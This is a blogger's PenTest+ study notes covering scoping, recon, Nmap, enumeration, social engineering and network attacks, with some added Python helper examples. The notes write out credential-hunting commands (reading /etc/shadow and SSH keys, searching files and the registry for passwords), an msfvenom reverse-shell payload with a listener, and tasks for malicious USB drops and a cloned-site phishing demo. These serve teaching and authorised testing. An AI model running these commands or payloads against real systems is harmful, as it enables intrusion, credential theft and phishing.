I created a PDF notebook a while ago when I decided on a whim to do the Pentest+. I have quite a few people ask me about getting into cyber security and well, you know when I was younger this stuff was just called IT mainly (IT + Infosec) so I thought let’s go test out the Pentest+. I did the course and exam in a week (whilst writing the notebook) (don’t think that’s a good idea but my objectives were more to make sure if I think it’s any good or not). Pleased to say I thought the course was good (I used pluralsight at 1.x speed) and the exam was fun (for an exam).

Hopefully this helps people explore some of the world of offensive security and appsec.

A glimpse at mRr3b00t’s world

Hi, I’m Dan! Nice to meet you (if I don’t already know you)!

I’m an information technology and security professional (you know ‘teh Cyberz’) who has spent his career on a constant learning journey. I’ve planned, built, broken, reviewed and sometimes managed to break into a range of systems over the years. By day I help organisations improve their technology and security management (I do this with my own style, blending traditional management consultancy with hands-on tech skills combined with a truck load of energy and passion), helping organisations change the way they do things (hopefully for the better :D).

I spent a lot of my non-project time also creating community content, games and sometimes finding time to go and hax all the things in capture the flag games.

If for some reason you aren’t bored of me after reading some of my notes, feel free to come chat to me online, I mostly hang out on Twitter (

This is the first draft release of the notes I took whilst I did the Comptia Pentest+ course and exam over a ~1-week period.

Everything in here is draft, if you find something that’s totally wrong please let me know, if you think there’s cool stuff I could add that’s great hit me up. If you think you could do it better, please go and make your own and share all the things with the world! I’m not a fan of gatekeeping and I try and share knowledge and content which I think can help people (I’ve got a few videos on

I really hope these notes are of at least some use, even if they are just interesting to see the process I went through when I randomly decided to do a course and exam in the space of a week!

I managed to sit a ~25 hour CBT course on Pluralsight and book/take the exam in a week. In the exam I think I got 833 points in about 60 minutes. I’d highly recommend doing a lot more prep than I did, do lab work, learn the craft and the theory! (also there’s loads of bits of paper you can get, the fun part is the journey not the destination!)

Keep an eye out as well because I’ve trimmed some content out for this initial draft publish so there might be more to come in the future!

Be safe, don’t have shit passwords and stop exposing RDP to the net in an insecure manner!

Peace! – mRr3b00t


The modern world is filled with technology: the internet enabled global communications, and miniaturisation has provided the world with even more pervasive and embedded technology services that are integrated into daily life. With this explosion of technology, we are now in a world where technology is so integrated into our lives that the role it plays would be considered critical.

Banks, Power Plants, Factories, Healthcare Services, Restaurants, Shops, Transport Services, Cars, Phones, Point of Sale systems, Water Supplies, you name it, it probably relies on a computer to operate.

This e-book is designed to help people have a BASIC understanding of penetration testing. It is not a complete guide to HACKING THE PLANET and only touches on tools, techniques and practices that are used in the cyber realm to affect the CONFIDENTIALITY, INTEGRITY or AVAILABILITY of digital assets.

I’ve based the core of this on intel which will help people in foundational certificates such as the PenTest+ but these are also foundational areas which can support:

  • eJPT
  • OSCP
  • CEH

This isn’t an official guide, it’s not a HOW TO, it’s simply a collection of information I collected, curated and created whilst I was doing some exploration. I’ve tried to add my own spin to some areas; where I saw something that’s totally missing or needs modernising, I’ve tried to call it out. It is not designed as a book to read, you will NEED to develop, train and grow your skills using labs and penetration testing platforms such as:

  • TryHackMe
  • HackTheBox
  • VulnHub
  • Vulnerable VMs
  • Vulnerable Training Tools (e.g. OWASP Juice Shop, OWASP BWA, OWASP Mutillidae 2)

And if you keep an eye out, maybe a PwnDefend CTF game!

I’d also highly recommend that you leverage either an online training service (such as Pluralsight or ITPRO.TV) or a formal instructor led course. Self study has some limitations, your view/viewpoint may


Using offensive security testing techniques without authorisation from the asset owner is almost certainly illegal. Use these at your own risk. Do NOT break the LAW!

The materials in this document are not endorsed by any third-party company. The content here is NOT specific to a single course, certification, framework

Realities of System Security Assurance Activities

  • Penetration testing is not a single task, there are many views, viewpoints and perspectives.
  • Penetration testing is not a silver bullet
  • When we look at spend on penetration testing vs revenue of a business the % is tiny, bear that in mind!
  • This is not Hollywood; you will NOT be raining in shells getting r00t and owning everything you see. Even if you can get a shell, your scope may indicate that’s the end of the test.
  • In unauthenticated black box external web tests you might see people say the expression ‘SHELLS are DREAMS’ – that’s because the % likelihood of you finding RCE or having enough time to successfully execute a potential vulnerability may be far more limited than you think.
  • Penetration testing is NOT red teaming
  • Red teaming also has a defined scope
  • You can do security testing without calling it a penetration test or RED team
  • Penetration testing without doing any other security assurance activity first is normally not very efficient or recommended
  • White box testing is generally more efficient
  • Report writing takes time (if you want to have a good report that is)
  • You might not find EVERY vulnerability (in fact I’d say it’s unlikely you will find EVERYTHING ever)
  • The landscape is fast moving: secure today != secure tomorrow
  • Penetration testing is POINT IN TIME
  • You will almost certainly need help; building a network of trusted peers, colleagues and friends is a highly recommended thing to do
  • There are constraints (a lot more than people think of)
  • Security testing requires a broad and deep level of experience not only with exploitation but also to be able to articulate remediations and mitigations.

Learning Modules

There’s a whole heap of things you need to know about conducting a penetration test, and it may come as a surprise to many but there’s a lot of logistics, planning and paperwork involved.

I’m not going to be exhaustive here (or highly verbose) but rather highlight some key areas for you to think about.


Penetration testing isn’t normally conducted in house; therefore, you should be aware that there is a requirement for services to be SOLD. So, consider things like the following:

  • Margin/Revenue
  • Market Positioning
  • Costs
  • Timescales
  • Certifications
  • Standards

Sales is not easy but it’s critical that the sales process is conducted in a manner that ensures both the recipient and the provider (that’s you) get value. Realise there are constraints but also realise that in sales you can say no. We are here to help people, not just tell them yes. Not everyone in the world is good at scoping their own requirements, let alone designing a penetration test that’s valid for their specific scenario, so communication here is key.


Test Focus

  • Objective
  • Compliance

Test Types

  • Black Box
  • Grey Box
  • White Box
  • Hybrid

Test Scope Definition

  • Authenticated, Unauthenticated
  • Social Engineering
  • Denial of Service, Stress Testing
  • Web, Application, API, Infrastructure, Hardware, Wireless
  • Inclusions
  • Targets and Test Types
  • Exclusions
  • Constraints
  • Times of Testing


  • Authorisations and Waivers
  • Scope Agreement
  • Rules of Engagement
  • Scheduling
  • Communications
  • Escalations

The Penetration Testing Project

  • Passive Recon
  • Active Recon
  • Vulnerability Assessment
  • Penetration
  • Exploitation
  • Post Exploitation

This is not the ONLY flow; it’s iterative and can jump around.

  • Post Test Clean-up

Reporting, Findings and Recommendations

  • Exec Summary
  • Categorisation of Findings
  • Priority
  • Standards such as CVSS
  • Safe handling of information and documents


  • Post Testing and report creation debrief
    • Ensure key sponsor is kept up to date and in the loop
    • Brief wider team
      • Two-way communication flow

Penetration Testing Tools – The basics

Here is a list of tools that are covered in the PenTest+ course (but these are also applicable to any penetration testing service or course). Where possible, links to tools and download locations have been provided. Clearly you can deploy a security testing distro such as Kali Linux or Parrot, but you may want to simply install Ubuntu or use Windows and WSL 2.

Open Source Intelligence Gathering Tools

Network and Vulnerability Scanning Tools

Credential Testing Tools

Debugging Tools

Software Assurance Tools

Wireless Testing

Web Proxy Tools

Social Engineering Tools

Remote Access Tools

Network Tools

Mobile Tools

Misc Tools

Lab Environment


  • An internet connection
  • A Host System that supports running a type 2 hypervisor or Cloud IaaS provider
    • Enough CPU resources
    • 16GB RAM
    • 1TB Storage
  • A type-2 hypervisor such as:
    • Oracle Virtual Box
    • Hyper-V
    • VMWare Workstation
    • VMWare Fusion

Guest Operating Systems

  • Kali Linux
  • Black Arch
  • Parrot OS
  • Windows 7 Pro Eval
  • Windows 10 Enterprise Eval
  • Windows Server 2016 Eval
  • Windows Server 2019 Eval

Getting ISOs etc. isn’t always simple; however, you can use tools such as RUFUS:

from the vendor sites or using this tool:

Vulnerable Pre-Made Targets

Metasploitable (


Extras For learning



Penetration Testing Standards and Frameworks

Types of Penetration Test

  • Objective Based
  • Target Based
  • Compliance Based


  • PTES
  • NIST


Penetration Testing Phases


Scoping, Project Setup, Legal & Regulatory, Scheduling, Rules of Engagement

It’s not all pew pew bang bang, there is a lot to be considered, planned, agreed and scheduled.

Penetration Testing Phases

Post Exploitation

Report Creation and Delivery

Key Stakeholder and Team Playback

This is (in my opinion) an undervalued activity area and one that does not receive the attention it deserves. This part is the key element of a security assurance testing project. A lot of people consider the report to be the outcome of a pen test, and from a standards point of view that might be the case; however, what I know is that unless you are simply ticking a box, the key value is ensuring the recipient of the test understands not only what the findings mean to them in terms of business risk, likelihood, confidence and impact but also how to develop remedial or mitigation strategies (this includes advising on how to avoid creating the vulnerabilities in the first place).

It’s important not only to ensure the recipients understand the findings but also to ensure that additional business contextualisation occurs. Not every finding will be acted upon, and sometimes that’s for a very valid business reason (other times you may need to really outline what the potential impacts may be). Either way, communication is key! Remember the objective is to improve the security posture through identification of weaknesses.

Pentest – Recon

Our goal here is to understand as much about the target as possible both from a passive perspective and an active perspective.

Tool bag

You are also going to want to use several services such as:

  • Public facing websites
  • GitHub Repositories
  • Social Media Sites
  • Search Engines
  • News Sites/Press Releases
  • Job Descriptions/Job Adverts

We are also going to want to use other tools such as:

The Internet Archive WayBack machine:


Recon Types and Focuses

With regards to penetration testing there are 2 types of recon:

  1. Passive Recon
  2. Active Recon

Passive Recon

During passive recon we don’t directly touch the target environment. Instead we leverage alternative data sources to enumerate information about the target organisation and scope.

Search Engines

Example – Google Dorking

Before we hit some of the syntax there’s a cool db and loads of web resources on this topic:


  • site:
  • filetype:
  • inurl:
  • intitle:


  • OR
  • AND




We can search DNS using a tool as simple as “nslookup”.

Other tools exist such as:


Maltego comes in a variety of shapes and sizes: Community, Classic, XL etc.

Maltego is a great tool at collecting, collating, creating and visualising data using graphs for open source intelligence gathering and analysis.


Spiderfoot isn’t included in PenTest+ to my knowledge but it should be! There’s an open source version of Spiderfoot and also a hosted commercial version called Spiderfoot HX.


Shodan is a search engine for systems, devices and services.



Recon-NG is a great tool that also integrates into a large range of tools via API keys.

theHarvester

Documenting Findings

Once you have gathered intelligence on your target you need to filter it and ensure the data you are creating supports your objectives.

You are trying to find intel that helps:

  • User lists/Email Lists
  • Organisation Data
  • Organisation Structure
  • Suppliers
  • Remote Access Services
  • Physical Locations
  • Network and DNS information
  • Products and Services

Active Recon

Here our systems connect to the target services.

Network Scanning

  • Nmap
  • Nikto
  • Metasploit

Nmap (Network Mapper)

A basic Nmap scan covers the 1000 most common ports (not ports 1-1000).

Common scan types

  • Connect Scan (Full Scan) – This completes the full 3-way handshake
  • SYN Scan (Half Open) – This does the first step of the handshake: sends a SYN, gets a SYN-ACK and then never completes the conversation
  • Tracert (conducts a traceroute)
  • Ping (uses the ICMP protocol to echo the target)
  • UDP Scan (super-fast UDP scan: nmap -sU --defeat-icmp-ratelimit, requires Nmap 7.4 or later)
  • NULL Scan (TCP packets with no FLAGS set)
  • FIN Scan (TCP packets with only the FIN flag set)

A common scan people use:

nmap -vvv -O -sV -sC -sS -T4 -oA results <target>

This scan will be verbose (x3), will detect the operating system version (-O), service versions (-sV), run the default NSE scripts (-sC), use a SYN scan (-sS) with the aggressive timing template (-T4) and write the output in all three formats (normal, grepable and XML) to files named results.* (-oA results).
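As an added example (not from the original notes), here is a small Python parser for the results.xml file that -oA writes: it turns hosts, open ports, service versions and the OS guess into rows for a findings table. The XML is a constructed sample and the helper names are my own.

```python
"""Parse Nmap XML output (the results.xml that -oA / -oX writes) into a
reporting-friendly structure. Added example, not from the original notes."""
import xml.etree.ElementTree as ET

# Constructed sample in the shape Nmap emits, trimmed to the elements this
# parser reads. Addresses are from the documentation range 192.0.2.0/24,
# so nothing here refers to a real host.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -vvv -O -sV -sC -sS -T4 -oA results 192.0.2.0/30">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.0.2.1" addrtype="ipv4"/>
    <hostnames><hostname name="gw.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1" extrainfo="Ubuntu"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.18.0"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed" reason="reset"/>
        <service name="telnet"/>
      </port>
    </ports>
    <os><osmatch name="Linux 4.15 - 5.6" accuracy="90"/><osmatch name="Linux 5.4" accuracy="95"/></os>
  </host>
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.2" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="3389">
        <state state="open" reason="syn-ack"/>
        <service name="ms-wbt-server" product="Microsoft Terminal Services"/>
      </port>
    </ports>
    <os><osmatch name="Microsoft Windows 10" accuracy="90"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.3" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def _version_string(service):
    """Combine product/version/extrainfo the way the -sV VERSION column reads."""
    if service is None:
        return ""
    text = " ".join(v for v in (service.get("product"), service.get("version")) if v)
    extra = service.get("extrainfo")
    return f"{text} ({extra})" if extra else text


def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: ip, hostname, best OS match, open ports."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth reporting
        addr = host.find("address[@addrtype='ipv4']")
        hostname = host.find("hostnames/hostname")
        # -O can list several guesses; keep the one with the highest accuracy.
        matches = [(int(m.get("accuracy", 0)), m.get("name")) for m in host.iter("osmatch")]
        best_os = max(matches)[1] if matches else None
        ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are noise in a findings table
            svc = port.find("service")
            ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "version": _version_string(svc),
            })
        hosts.append({
            "ip": addr.get("addr") if addr is not None else None,
            "hostname": hostname.get("name") if hostname is not None else None,
            "os": best_os,
            "ports": sorted(ports, key=lambda p: (p["proto"], p["port"])),
        })
    return hosts


def service_summary(hosts):
    """One tab-separated line per open port: the rows of an asset/service table."""
    return [f"{h['ip']}\t{p['port']}/{p['proto']}\t{p['service']}\t{p['version']}"
            for h in hosts for p in h["ports"]]
```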

Scanning ranges

nmap {scan options} {target or range}

-sn = ping sweep (host discovery only, no port scan)

-PR = ARP ping (host discovery on the local subnet)
-PA = TCP ACK ping (sends ACKs for connections that don’t exist; a live host answers with a RST)

XMAS Tree Scan


OS Identification Through TTL

Different OSs respond to ICMP echo with different TTLs.

There’s a lot there but you just need to know the common ones like:

  • Common Windows Versions
  • Linux Versions
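An added example, not from the original notes, of the TTL heuristic in Python: it pulls the TTL out of Linux or Windows ping output (constructed samples, not captured traffic) and infers the nearest standard initial TTL, the OS family and the hop count. The initial TTL table and the function names are assumptions of this example; an administrator can change the default TTL, so treat the result as a hint rather than proof.

```python
"""Guess OS family and hop count from the TTL in an ICMP echo reply.
Added example, not from the original notes."""
import re

# Initial TTL values the common OS families set on outgoing packets.
# Assumption: these three cover "the common ones"; anything larger than 255
# is reported as unknown. Defaults are tunable, so this is a hint only.
INITIAL_TTLS = {64: "Linux/Unix/macOS", 128: "Windows", 255: "Network device/Solaris"}

# Linux ping prints "ttl=61"; Windows ping prints "TTL=126".
_TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)

# Constructed ping output (not captured) for two hosts in a documentation range.
LINUX_PING = """PING 192.0.2.10 (192.0.2.10) 56(84) bytes of data.
64 bytes from 192.0.2.10: icmp_seq=1 ttl=61 time=2.31 ms
64 bytes from 192.0.2.10: icmp_seq=2 ttl=61 time=2.10 ms
"""
WINDOWS_PING = """Pinging 192.0.2.20 with 32 bytes of data:
Reply from 192.0.2.20: bytes=32 time=1ms TTL=126
Reply from 192.0.2.20: bytes=32 time=1ms TTL=126
"""


def guess_from_ttl(observed_ttl):
    """Return (initial_ttl, hops, os_family).

    Every router on the path decrements the TTL by one, so the value the
    target started with is the smallest standard initial TTL that is >= the
    one we observed, and the difference is the number of hops in between."""
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return initial, initial - observed_ttl, INITIAL_TTLS[initial]
    return None, None, "unknown"


def summarise_ping(text):
    """Parse ping output and apply the guess to the most frequent TTL seen.
    Returns None when no TTL is present (e.g. 'Request timed out')."""
    ttls = [int(t) for t in _TTL_RE.findall(text)]
    if not ttls:
        return None
    ttl = max(set(ttls), key=ttls.count)
    initial, hops, family = guess_from_ttl(ttl)
    return {"ttl": ttl, "initial_ttl": initial, "hops": hops, "os_family": family}
```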









Packet Crafting

Creation of bespoke packets (hping, hping3 etc.)

  • Create
  • Edit
  • Play
  • Decode

Network Mapping Tools

  • ZenMAP
  • SpiceWorks
  • WhatsUp Gold
  • The Dude
  • Nagios
  • SolarWinds

Mapping the Network with Metasploit

  • Metasploit Framework
  • Community
  • Express
  • Pro


Now using Metasploit is fairly simple but it’s far too in depth for here!

Armitage

Included with KALI but no longer in development

Cobalt Strike

A commercial offering created by the author of Armitage

Other C2 Servers

  • Empire
  • Covenant

Enumerations Basics

Banner Grabbing

We can grab banners using tools such as telnet, nc, nmap etc.

To enumerate a banner with nmap we use -sV

We can also enumerate banners and service information manually using tools like telnet, netcat/nc etc.
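An added example (not from the original notes) that does in Python what nc or telnet does here, against a throwaway local listener so it runs offline: connect, read what the service volunteers before the client speaks, and pull the hostname and software out of an SMTP 220 greeting. The banner text, the local server and the function names are constructed for the demo; the same grab_banner call is a quick way to check what your own services disclose.

```python
"""Banner grabbing with plain sockets, demonstrated against a local stand-in
server. Added example, not from the original notes."""
import socket
import threading

# Constructed greeting in the shape a Postfix server sends on connect.
FAKE_BANNER = b"220 mail.example.test ESMTP Postfix (Ubuntu)\r\n"


def start_fake_smtp_server(banner=FAKE_BANNER):
    """Listen on 127.0.0.1 on an ephemeral port, send `banner` to every
    client and close. Returns the port. Stand-in for a real service so the
    example needs no network; an empty banner models a service that waits
    for the client to speak first."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host, port, timeout=3.0, max_bytes=1024):
    """Connect and read whatever the service sends before we send anything,
    as `nc host port` would. Returns the decoded, stripped banner; it is
    empty when the service stays quiet (HTTP, for example) or closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(max_bytes)
        except socket.timeout:
            data = b""
    return data.decode("utf-8", errors="replace").strip()


def parse_smtp_banner(banner):
    """Split a '220 <hostname> <software>' greeting into its parts, or return
    None when the text is not an SMTP reply line."""
    parts = banner.split(" ", 2)
    if len(parts) < 2 or not parts[0].isdigit():
        return None
    return {
        "code": int(parts[0]),
        "hostname": parts[1],
        "software": parts[2] if len(parts) == 3 else "",
    }
```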


SMTP

  • SMTP Port is 25
  • Encrypted SMTP (mail submission with STARTTLS) uses port 587
  • VRFY is used to check a mailbox
  • EXPN is used to check a group


FTP Attacks include BOUNCE. A BOUNCE attack uses one FTP server to MiTM another FTP Server.

On box enumerations

Using tools interactively / from an authenticated point of view such as:

Netstat (Windows and Unix Based Systems)


Basic Local Windows Enumeration

Command Execution (using cmd.exe shell)





whoami /priv

echo %path%

ipconfig /all

route print

arp -a

net use


net start

net users

net localgroup

net user administrator

net localgroup administrators

net localgroup "remote management users"

net localgroup "remote desktop users"

net localgroup "Backup Operators"

netstat -ano

netsh firewall show state

schtasks /query /fo LIST /v

tasklist /SVC


wmic qfe get Caption,Description,HotFixID,InstalledOn

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s *pass* == *cred* == *vnc* == *.config* == *.txt*

findstr /si password *.xml *.ini *.txt *.config *.xlsx *.docx

reg query HKCU /f password /t REG_SZ /s

reg query HKLM /f password /t REG_SZ /s

wmic process list brief | find "winlogon"

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Clearing Up Output (cmd.exe)

| #pipe output

> #output to file (overwrite)

>> #output to file (append)

| findstr #find a string in the output

PowerShell (using PowerShell)

Get-Command #show all commands


Get-LocalGroupMember administrators

Get-ChildItem -Path c:\ -Include *.docx,*.doc,*.xlsx,*.xls,*.config,*.ini -file -recurse -erroraction silentlycontinue | select-string password


Basic Linux Enumeration

There are a ton of tools you can use, from Enum4Linux, the Metasploit modules, smbclient, ftp, grep… honestly there’s a lot, so let’s look at some common tools:

  • Enum4Linux
  • Impacket
  • Metasploit
  • Nmap (we won’t cover that again)

enum4linux -a -u administrator -p Pa55w0rd1 <target>


There are hundreds of modules



Using Metasploit to hunt for SMB shares on a range (change the CIDR range on RHOSTS to suit)


search smb_enumshares

use auxiliary/scanner/smb/smb_enumshares

set RHOSTS <CIDR range>

run





Cool msf commands

setg #setglobal – makes the option stick between modules e.g. setg LHOST

set verbose true # enables verbose output

#RUN A LISTENER from the CLI on one line (set LHOST to the IP you are listening on)

msfconsole -x "use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set LHOST <your IP>;set ExitOnSession False;run"

On Box Enumeration (Linux)

BASH (Basic Enumeration)


#network interfaces, kernel and listening services
ip a
uname -a
netstat -antp
netstat -anup
df -a
dpkg -l

#running processes (and which run as root)
ps aux
ps aux | grep root
ps -ef | grep root
ps -ef

#users, groups, resolvers and installed software versions
cat /etc/services
cat /etc/passwd
cat /etc/shadow
apache2 -v
mysql --version
cat /etc/group
cat /etc/resolv.conf
nmap --version
find / -name nc 2>/dev/null

#scheduled jobs, sudo rules, shell history, keys and credentials in config
crontab -l
grep -i password /etc/my.cnf
cat /etc/sudoers
cat ~/.bash_history
cat ~/.ssh/id_rsa

#SUID and SGID binaries
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

METASPLOIT (Basic Enumeration)


Post Modules require a SESSION to be established:






Local Shell Test

The following test just lets you connect to yourself on your loopback address on TCP port 9999.

Metasploit Console

use exploit/multi/handler

set PAYLOAD linux/x64/meterpreter/reverse_tcp

set LPORT 9999


set ExitOnSession FALSE

run -j

Local Linux Machine (x64 Architecture)

#Create a Payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<listener IP> LPORT=9999 -f elf > shell.elf

#set as executable

chmod +x shell.elf

#run the payload

./shell.elf

You should see a local connection


We are now in a position where we can run POST modules:

use post/linux/gather/enum_system

set SESSION 2 #change the ID to match your session number – check sessions -l


Null Sessions

SMB on Windows prior to Server 2003, and also older versions of Samba, have this vulnerability.

To enumerate this, we can simply use:

net use \\target\ipc$ "" /user:""

net view \\target

WebServer Enumeration

HTTP Response codes

  • HTTP 401
  • HTTP 403
  • HTTP 404
  • HTTP 200
  • HTTP 402

These can be enumerated using a browser and its developer tools, a web proxy tool like BURP, FIDDLER or OWASP ZAP, or using tools like nmap etc.

nmap --script=http-enum <target>

nmap --script=http-php-version <target>

nmap --script=http-wordpress-enum <target>

Vulnerability Scanning


  • OpenVAS
  • Nessus
  • Qualys
  • Rapid7 Nexpose

I’d recommend downloading evals/trials and checking these out.


Common Scripting/Programming Languages

Generally Interpreted

  • Bash (tied to *NIX OSs)
  • Batch (Tied to OS DOS/WINDOWS)
  • PowerShell
  • Python
    • Python2
    • Python3
  • Perl
  • Ruby
  • PHP
  • VBScript
  • VBA
  • Javascript

Generally Compiled

  • C
  • C++
  • .net
  • Visual Basic
  • GoLang
  • Java

Penetration Testing Documentation Tools

  • CVSS Calculators
  • CWE
  • DRADIS Community
  • DRADIS Pro
  • AttackForge

Report/Note Taking Tools

There are literally tons of tools that can be used for note taking and report writing, some of these include:

  • Microsoft Word (I wrote this e-book in MS WORD, I write my reports in WORD too)
  • Microsoft OneNote
  • CherryTree
  • EverNote
  • Notion

Diagramming Tools

  • Microsoft Visio (Windows)
  • Smart Draw (OS X)
  • OmniGraffle (OS X)
  • Archimate

Social Engineering & Non ‘Technical’ Attacks

  • Non-Technical Attacks
  • Dumpster Diving

RFID Duplicators

  • Keysys


  • Social Engineering
    • Target Eval
    • Pretext/Pretexting (back story and context)
    • Psychological Manipulation
    • Building Relationships
    • Motivations
      • Authority
      • Scarcity
      • Urgency
      • Social Proof
      • Likeness
      • Fear
    • Impacts
  • USB Drop
    • In a test by a university a USB drop showed the following stats:
      • 297 Drives Dropped
      • 45% Phoned Home
    • Build by loading a USB drive using:
      • Autorun.inf
      • Embedded malware in documents, binary etc.
      • Use a HID attack (see Rubber Ducky)
    • Make them attractive
      • Use themed drives
      • Add logos
      • Add labels
      • Add keys
    • Think about where they are placed
    • Task: Place a malicious Binary on a USB drive:
      • Example: use msfvenom to create a payload
      • Demo this connecting to a listener
  • Physical Attacks
  • RFID Attacks
  • Phishing
    • Phishing Types
      • Email (Phishing)
      • SMS (SMISHING)
      • Phone (Vishing)
      • Social Media
      • Pharming
      • Spear Phishing/Whaling/Gaming/Live Chat
      • Physical Phishing
    • Social Engineering Toolkit (SET)
    • Evilginx
    • GoPhish
  • Lockpicking
  • Motion Sensors
  • Alarms

Phishing Task

Task: Use the Social Engineering Toolkit to demo a PHISHING attempt using the credential harvester method to clone a site. Send a phishing email to yourself on a separate account using a public email service like or google mail.

Physical Attacks

Physical Controls

  • Conduct Recon
  • Dumpster Dive
  • Visit the target
  • Photograph the Target
  • Deliver an implant
  • Steal a Device
  • Steal badges/ID
  • Fences
  • Gates
  • Tailgating
  • Lockpicking
  • Look for ways to bypass controls

Door Access Controls

  • Compressed Air/Vapes/Paper to bypass motion sensors or magnetic locks
  • Reach Around/Under
  • Lockpicks

Enumeration, Vulnerability Identification

Picking a vulnerability scanner

  • Open Source vs Commercial
  • On Premises vs Cloud
  • Documentation and Outputs


  • Golismero
  • Sparta
  • Kali
    • Nmap
    • Nikto
  • Nessus
  • Qualys
  • Rapid7 Nexpose

Picking a vulnerability scanning Tool

Open source vs Commercial

  • Pick one to suit your business requirements
  • Consider features
  • Look at false positive rates
  • Look at reporting and output formats etc.
  • Scope of features

Cloud vs On Premises

  • Pick solutions to fit your requirements
  • Do you need to test air gapped networks?
  • Ensure plugins are up to date

Interpreting Output

Asset Categorisation

  • The act of grouping assets
    • Organization/Defender View
    • “Pentester” View


The act of going through and evaluating the threat those pose to the target organisation.

False Positives

When a service is incorrectly identified as being vulnerable when it is in fact, not vulnerable.

Common Themes

Conditions that re-occur all the time such as:

  • Behaviour Patterns
  • Naming standard patterns
  • Policies being ignored
  • Weak physical security
  • Inadequate Training
  • Weak security configurations
  • Poor software development practices
  • Insecure network protocols (e.g. TELNET, FTP)
  • Obsolete cryptography


Ranking vulnerabilities in terms of priority for exploitation/impact and/or remediation.

Mapping & Prioritisation

  • Mapping customer assets and relationships
  • Mapping processes, people, activities etc.
  • Consider times of events, activities etc.

Creating a ‘picture’ of the attack surface landscape.

Attack Techniques

  • Denial of Service Attack
  • Hijacking
  • Man-in-The-Middle
  • Credential reuse
  • Password Attacks
  • Social Engineering
  • Injection


  • Social Engineering
  • Planting a Device/Implant
  • Remote Access
  • Wireless Attacks
  • Conspiring with an internal threat actor

Exploits & Payloads


An exploit is the action/mechanisms to exploit a vulnerability (e.g. Unauthenticated RCE, Path Traversal, Code Injection)


A payload is the code that will run on the target e.g.

  • Meterpreter

Staged vs Unstaged Payloads

A staged payload is a small payload which downloads the full payload.

An unstaged payload simply runs following the exploit.

Cross Compiling Code

Exploit Modification

  • Debugging
  • Shell Code creation

Exploit Chaining

The act of chaining multiple exploits together.

Proof of Concepts

An exploit that is created to highlight and validate a vulnerability and exploit chain.

Deception Tactics

  • Creating a distraction
    • Social Engineering
    • Other Attacks
    • Distracting event

Password Attacks

  • Brute Force
  • Wordlists
  • Hybrid
  • Rainbow Tables

Network Penetration Testing


Ethernet & TCP/IP Networks

  • Sniffing
    • Network cards including Wireless cards must be in promiscuous mode
    • TCP, IP, ARP, ICMP, IGMP, LDAP, SNMP, SMTP, SMB, FTP, DNS, DHCP, POP3, IMAP, UDP and HTTP can all be sniffed (any cleartext protocol)
  • Eavesdropping
  • ARP Poisoning
    • The act of sending our MAC address out identifying as the default gateway to route traffic through our host
      • IP forwarding
      • DNS Poisoning
      • Ettercap
  • TCP Session Hijacking
    • The user/machine must have authenticated before
    • Requires a clear text protocol (e.g. TELNET/RLOGIN)
    • Increasing TCP sequence numbers must be detected and guessed (they are pseudo random)
    • Signing is not in use (e.g. SMB signing is not ENABLED)
    • ARP Poison
    • Send FIN packets to the target to disconnect the client
    • Requires you to spoof IP and MAC
    • Tools include:
      • Tsight
      • Juggernaut
      • Hunt
  • Browser Hijacking
    • Cookie Sniffing (ARP Poison and HTTP session theft)
    • Session Fixation (Cookie is assigned before authentication)
    • Failure to timeout the cookie or destroy the session
    • Predictable sessions token
    • Cross Site Scripting (XSS)
    • Session Variable Overloading
  • Man-in-the-middle (MiTM) Attacks
  • Brute force Attacks
    • Brute Force
    • Dictionary
    • Tools
      • Aircrack-ng
      • THC-Hydra
      • Medusa
      • Patator
      • John-The-Ripper
      • Cain and Abel
      • Hashcat
      • L0phtcrack
      • Metasploit
  • Denial of Service and Load Testing
    • Deny Service
    • Fail Open
  • Pass-The-Hash
    • Requires us to get a copy of the NTLM/NTLMv2 HASH (not netNTLM)
  • VLAN Hopping
    • MAC Table Overflow
    • Trunk Ports
      • Switch
      • Client Side
    • Tools
      • Frogger

Network Protocol Exploits

SMB

Has been exploited for a long time!

  • MS06-087
  • EternalBlue (MS17-010)
  • Eternal Romance
  • Eternal Champion
  • Eternal Synergy

SNMP

  • Community String Defaults (v1 & v2)
    • Public
    • Private
  • Tools
    • Hydra
    • Medusa
    • nmap
    • BOF
    • Metasploit


  • Tools
    • Hydra
    • Medusa
    • Nmap


  • DNS Cache Poisoning
    • Tools
      • Ettercap
      • Metasploit
      • DNSChef
      • ArpPwner

Name Resolution

Wireless Networks


